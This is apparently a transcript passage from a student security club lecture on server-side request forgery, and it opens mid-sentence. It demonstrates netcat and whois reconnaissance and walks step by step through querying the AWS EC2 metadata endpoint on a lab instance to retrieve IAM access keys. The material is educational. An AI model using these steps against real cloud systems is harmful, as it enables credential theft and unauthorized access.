chances of it getting vulnerable are super high. The reason I said chances are high is not every request that you give, like let's say, if I give my personal domain, so if I'm on company X's website, they have a feature where I can give it a URL and it fetches the content of it, and if I give it my personal website and if it makes a connection, that does not mean it's vulnerable to SSRF, right? It's basically just sending a request. The only way it's going to be vulnerable to SSRF is if you can give it a local IP and if it still makes connection to that and gives you a response back. Okay? So that's why the chances of it being super high is because companies usually do not set a block of IP address to not send requests to. So for example, now we're going to talk about exploiting the SSRF. So we kind of went with the basics of it. Using Netcat definitely helps. Sometimes you don't have to use Netcat. The reason I say using Netcat helps is because if you remember with Netcat when we were doing RCE and stuff, if you notice it, if I can pull it here, looks like not. Anyways, let me see if I can create a Netcat real quick. So if I do curl http sss.osscsuf.org port 8080, you'll see here that it says connection from and the IP address. So knowing an IP address is super important in SSRF because when it comes to server-side requests, you want to see what system they are using. If they are using a cloud environment like Amazon Web Service, Google Cloud, DigitalOcean, or if they have their own system. So if it's an IP address directly belonging to a company, so let's say I'm testing Facebook and I get a hit from Facebook's IP address, that means they are using their own server for this, right? They're not hosting it on an external server. And at that point, your attack phase changes because you'll have to start looking at the IP addresses within the system to see what are open and what is not. We'll cover those details on the spring. For today, we're just going to cover attacking one public service or one cloud service, which is AWS. All right. So as I said, check the IP. So always reverse the IP and see what the result is. And now, I just wanted to point this out. Is the list of local IPs. So what happens is RFC is basically rules that help the internet exist to some extent. It kind of sets a standard for how things should be done when it comes to designing networks, designing websites, and stuff like that. All right. So if we go all the way down, there are a list of address blocks or IP blocks that are designated for local use. So these are known as special IPv4 addresses. And if you go to this website, this will be linked on our YouTube channel. You'll see there's address block from 008, all the 10 IPs, 14, and for 192, right? So there's IP block with 24 subnets, 192.0.0, 192.168. So not all 192 are private, right? So it has to be one starting from 192.0.0 or 192.0.2 or 192.88 or 192.168. Others can be public depending on how they are used. There's also other ones like 169.254, there's 172. So you might have seen some of this when it comes to checking your router configuration. For example, in routers, if you usually go to 192.168.1.1, it will load your router config where you can modify your Wi-Fi and stuff like that. So if you have used it in the past, you know that 192.168 has to be an internal IP. Alright, so I'll share this. It's super important to have this because you guys can reference this as you're testing some things, to hitting all of these and see which one will work and which one won't, to see which one is blocked or which one is down, which one is up. Okay. All right, now let's get back to the slides, and what we're covering is SSRF and on AWS, Amazon Web Service. So I'll be showing you guys an example of this. SSRF on AWS can get super bad or can be very bad, depending on how the administrator in AWS, so the person who set up the AWS for that company, is doing their security management, how they're managing all their instances and stuff like that. Okay, so we're going to start out with a website. So this scenario here is a website similar to the RCE website that we played around with, but in this case we have fixed the IP address, or the RCE. Okay, so the RCE is fixed. I, as a developer of the RCE, can tell you it is fixed, but what if there is another vulnerability, in this case an SSRF? So let's see if we can identify the IP address of this. So we open a netcat here, and we for the URL we give it HTTP, our URL, so that will be sh.oss.usuf.org, port 8080. It's submit, and as you can see it's trying to load, but because it's taking forever, and the reason it's taking forever is because I haven't closed the connection here, so let's close it. And now we have the IP address. So the IP address of the remote server or the vulnerable system is 3.89.84.25. Let's copy that and paste it here. Now what do we want to do with this IP? We need to see who controls, who owns, who manages the IP address. If it's a single company, if it's a cloud server like AWS, Google, or something like that. Okay, so let's do a Google search. Doesn't show much info, so let's do IP info. Okay, so once we do that, let's do who owns. Give me a second. Who owns the IP, and hopefully there's an IP address block with geo lookup, and this matches, the subnet matches the one that we are in. So let's click this, and they have a bunch of subnets. Hopefully they tell us who owns this. Doesn't look like it. So let's see if we can find another website. If not, I'm going to show you a Linux terminal command that can help you with this. So let's look up who owns this IP, and hopefully this has it. So let's give that a shot. There we go. So once I hit that, as you can see, the whois data told me the IP block 3.8 in subnet 12, it belongs to Amazon. So it says Amazon Data Services. So this is with the website. Now there's another way to do it, is if you do whois on Linux and give the IP address, you'll see it says it's Amazon AWS Network Operations handles this, and it seems like it's hosted on an EC2 instance on AWS. Don't worry if you don't know what EC2 is. It's more AWS kind of word. So if you have used in the AWS in the past, you'll know what an EC2 means. If not, don't worry about it, as I said. Alright, so now we know it's using Amazon. So let's say this is my first time doing an SSRF exploit on Amazon. A couple of things to look for is we know it's using AWS, and all we have to do is look for SSRF, and here's a Google search. So we'll find a couple of things popping up. There's a SSRF vulnerability report. There's a blog. So let's check out both of these. So here the user tells us the test URL. This is a report sent on HackerOne, and let's see if this document from Amazon helps us. Alright, so here are some URLs. So if you read it carefully, what it says is if you are running an EC2 instance from the EC2 server, you can hit your metadata to see information about your instance. So there are a couple of URLs here. It seems like all of them start with this IP address. Okay, so let's see if we can give this IP address to the vulnerable system. So let's go to super secure or secure, whatever that was. Here we go. We give it http/, and we want to see if we can actually hit this, right? Because if I'm a developer that I want to secure the page, I might have tried to block it. In this case, I have not, so we're able to hit it, and this looks pretty familiar to this. If we check it out, right, except for the dates, the response looks familiar. So it seems like we're on the right track. Now our goal is to see what we can do. So it seems like, based on what they say, is we can query this. So let's look for latest/metadata. Alright, so let's go back and put things like latest/metadata, and then do that, and we can see we're able to hit some of those info. So now let's read more on what we can do. So it tells these are the examples to get value. There's AMI ID, public host name, public keys, open SSH key, subnet ID, user data, dynamic data. Alright, doesn't seem like there's much we can do so far, does it? So there's AMI, launch index. There are a couple of things definitely we can do. Is see host names and stuff. So let's read. It seems like these are all the metadata categories that we can hit. So let's go here and let's see if there's any important here. There's IAM. If there's an IAM rule associated with the instance, contains information about the last time the instance profile was updated, including the instance last updated date, instance profile ARN, profile ID, if not present. Okay. IAM security credentials role name. If there's an IAM role associated with the instance, and the role name is the name of the role, contains temporary security credentials associated with the role. So this seems like some pretty interesting info, right? It's the security credentials for an IAM role. Now, I have used AWS, so I already know what that means, but if you have not, IAM roles in AWS are used to give permissions to users. So basically, if you're running an AWS throughout your company, so if your whole company is on AWS, you can specify IAM user roles. So let's say, that way only IT person can only access IT related stuff, not finance data or not finance server, and a finance person can only access the finance server or database and not the IT or the host or database for user data and stuff like that. Okay, so we know what the IAM role is in general now. So, and we see there's an IAM directory here. So anything that has a slash in the backslash, that means, or the forward slash, that means it's going to have a directory. So let's see if we can hit our IAM directory, and we're able to hit the security credentials. Then that means security credentials might exist. So let's go here and the security credentials, hit submit, and we see there's a flag role. So we now know that there's a role. So in AWS, what you can do after this is specify the role name. So we know the flag role. Looks like I misspelled that, so let's go back. There we go. So once I pulled flag role, you can see it says code success. It told me when it was last updated. It says what kind of key it is HMAC, and it gives me the access key ID and the secret access key for the user, and it tells me when it expires. So now I can use this access key ID or secret access key to log in on the AWS CLI and execute commands as that user. When you're watching this video, this instance will be down because I don't want to put a vulnerable instance like that online. So if you have not used AWS before, and if you want to learn more about it, you can easily sign up on AWS for free. So as long as you don't use a lot of their service, you are not going to get any bills. You get free 1 year AWS account, and the reason is they allow you to test things, so you get a free limited access, so you can run like some commands and stuff. You can play around with it a lot, but it's super useful to know what AWS is, especially in the current period where a lot of companies are moving to cloudless environments or cloud servers, serverless environments to be exact, right? So AWS is one of the most used one. There's Google Clouds, so look those up. Um, if you're interested in a project to exploit AWS when you have an access key and a secret access key, let me know and we can work on that project over the spring break. So we can create a team for you guys and you guys can handle that project. The only requirement is you'll have to present it at the end of the semester. So you'll have to show it to the club, whoever you want to show it, right? So that we see your work and we can share the work with the world. We'll basically make it open source so that the world can see it. And it's basically a great resume builder because you'll be creating a offensive tool for security purposes, right? So let us know if you're down for it. We can set you up in a team and you guys can go from there. There are already some public tools, but if you want to learn AWS and attacking AWS, then this is a really nice way to go. Okay, so I know SSRF was still fast to some extent. There was not much to cover for it because we're doing the basics of SSRF. In the spring break, I'm going to go over fixes and bypasses for SSRF, so that will be a whole video on its own, and it's probably going to be longer than this. So thank you very much for watching this. I know this was a long video. Hopefully you liked what the resources were and you learned something out of it. If you have any questions, let me know in Slack and I'll be happy to help. Thank you very much, guys. Have a great weekend.